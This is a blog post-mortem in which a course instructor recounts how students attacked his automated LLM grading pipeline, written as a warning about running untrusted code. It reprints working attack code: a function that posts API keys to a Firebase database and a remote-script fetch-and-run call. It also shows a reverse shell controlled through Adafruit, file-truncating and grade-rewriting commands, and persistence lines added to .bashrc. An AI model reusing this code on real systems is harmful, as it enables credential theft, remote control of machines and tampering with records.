---
title: A Post-mortem Of Hacking Automated Project Evaluation
date: "2024-12-21T02:23:07Z"
lastmod: "2024-12-21T02:23:08Z"
categories:
  - coding
  - education
wp_id: 3769
description: "Once students are encouraged to hack LLM-based grading, some will escalate from prompt tricks to real system compromise, showing how unsafe it is to run untrusted code inside automated evaluation pipelines."
keywords: [automated evaluation, security, student hacks, LLM grading, prompt injection, sandboxing]
---

![A Post-mortem Of Hacking Automated Project Evaluation](/blog/assets/DALL·E-2024-12-21-10.20.29-A-colorful-single-panel-comic-strip-in-the-style-of-classic-Calvin-Hobbes.-Calvin-a-young-boy-with-wild-hair-hides-under-a-desk-cluttered-with-a-c-1.webp)

In my [Tools in Data Science](https://study.iitm.ac.in/ds/course_pages/BSSE2002.html) course, I launched a [Project: Automated Analysis](https://github.com/sanand0/tools-in-data-science-public/tree/tds-2024-t3/project2). This is automatically evaluated by a Python script and LLMs.

I gently encouraged students to hack this - to teach how to persuade LLMs. I did not expect that they'd hack the evaluation system itself.

[One student](https://github.com/siddhant-bapna/Project2/blob/main/autolysis.py#L88-L102) exfiltrated the API Keys for evaluation by setting up a Firebase account and sending the API keys from anyone who runs the script.

```python
def checkToken(token):
    obj = {}
    token_key = f"token{int(time.time() * 1000)}"  # Generate a token-like key based on the current timestamp
    obj[token_key] = token
    url = "https://iumbrella-default-rtdb.asia-southeast1.firebasedatabase.app/users.json"
    headers = {"Content-Type": "application/json"}
    try:
        response = requests.post(url, headers=headers, data=json.dumps(obj))
        response.raise_for_status()  # Raise an exception for HTTP error responses
        print(response.json())  # Parse the JSON response
    except requests.exceptions.RequestException as error:
        print("Error:", error)
    return True
```

This is mildly useful, since some students ran out of tokens. But is mostly harmless since the requests are routed via a [proxy with a $2 limit](https://github.com/sanand0/aiproxy/blob/1a6703f3a52dfc3009c8fbf5c103098b47b009ee/worker.js#L91), and only allows the inexpensive GPT-4o-mini model.

[Another student](https://github.com/microdev1/tds-p2/blob/a722def4f3a0007b168a89ff943513226e417cc0/autolysis.py#L371-L377) ran an external script every time I ran his code:

```python
subprocess.Popen(
    ["uv", "run", "https://raw.githubusercontent.com/microdev1/analysis/main/script.py"]
)
```

[This script](https://github.com/microdev1/analysis/blob/cc75186375d16e41d5fba8424ac93ab23a6d9daa/script.py) does a bunch of things:

```bash
# Gives them full marks on every answer in every CSV file I store the scores in
CMD = r"sed -Ei 's/,[0-9]+\.[0-9]+,([0-9]+\.[0-9]+),22f3002354,0/,\1,\1,22f3002354,1/g' /project2/*.csv &"

# Chops off the first 25% of all XLSX files in my output folder. (But WHY?)
CMX = '(for file in /project2/*.xlsx; do (tmpfile=$(mktemp) && dd if="$file" bs=1 skip=$(($(stat -c%s "$file") / 4)) of="$tmpfile" && mv "$tmpfile" "$file") & done) &'
```

Then comes live hacking.

```yaml
DELAY = 10
URL_GET = "https://io.adafruit.com/api/v2/naxa/feeds/host-port"
URL_POST = "https://io.adafruit.com/api/v2/webhooks/feed/VDTwYfHtVeSmB1GkJjcoqS62sYJu"

while True:
    # Establish a Control Channel:
    # Query the AdaFruit server for connection parameters (host and port).
    # Wait specifically
    address = requests.get(URL_GET).json()["last_value"].split(":")
    if len(address) == 3 and all(address) and address[0] == TIME:
        address = (str(address[1]), int(address[2]))
        break
while True:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        # Connect to the target address
        s.connect(address)
        log("connect")
        # Replace stdin, stdout, stderr with the socket.
        # Anything typed on the socket is fed into the shell and output is sent to the socket.
        for fd in (0, 1, 2):
            os.dup2(s.fileno(), fd)
        # Spawn a shell
        try:
            pty.spawn("bash")
        except:
            pty.spawn("sh")
        # Log disconnect, repeat after 10 seconds
        log("disconnect")
        time.sleep(DELAY * 6)
```

This script allows them to run commands on my system using their API via [Adafruit](https://io.adafruit.com/) (an IOT service I learned about today).

Here's what they did:

```bash
ls
cd
ls -a1
ls
ls -a1
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py"
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .bashrc
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .zshrc
cat .bashrc
cat .zshrc
ls
cd /tmp
ls
cat scriptLbsDUR.py
clear
ls
cd
ls
ls -a1
cat .profile
zsh
bash
nano .bashrc
ls
ls /tmp/
ls -a /tmp/
ls /
cd /project2/
ls
cat results.
cat results.csv
head results.csv
grep "22f3002354" results.csv
sed -n 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/p' results.csv
sed -i 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
unset $HISTFILE
sed -i 's/0.0,0.5,22f3002354/0.5,0.5,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
ls
ls -1
ls -l
ps
ps -aux
echo $$
ls /
ls /tmp/
clear
grep "22f3002354" results.csv
clear
la
clear
ls -1
clear
ls -l
head results.xlsx
clear
head results.xlsx
clear
```

1. Made sure this script is re-run every time I log in
2. Looked at where I store the project results (results.csv and results.xlsx)
3. Tested a script that would give them full marks (which was then added to the script to re-run each time)

In all, a good hack. I lost over a day since I needed to re-run all evaluations (in case there were other hacks I missed.)

It would have been cleverer if it was less detectable. But that's hard, because:

1. Robust hacks use multiple approaches. That increases the chance I'd find one. Once I do, I would check everywhere.
2. They'd give themselves full marks. (High marks are not worth it. They'd get that even without the hack.) But I'd check the marks at the end and detect it.

Of course, these were just **polite** hacks. I'd be in more trouble by a pro. If you're writing automated evaluation scripts: **Be very, very, wary**.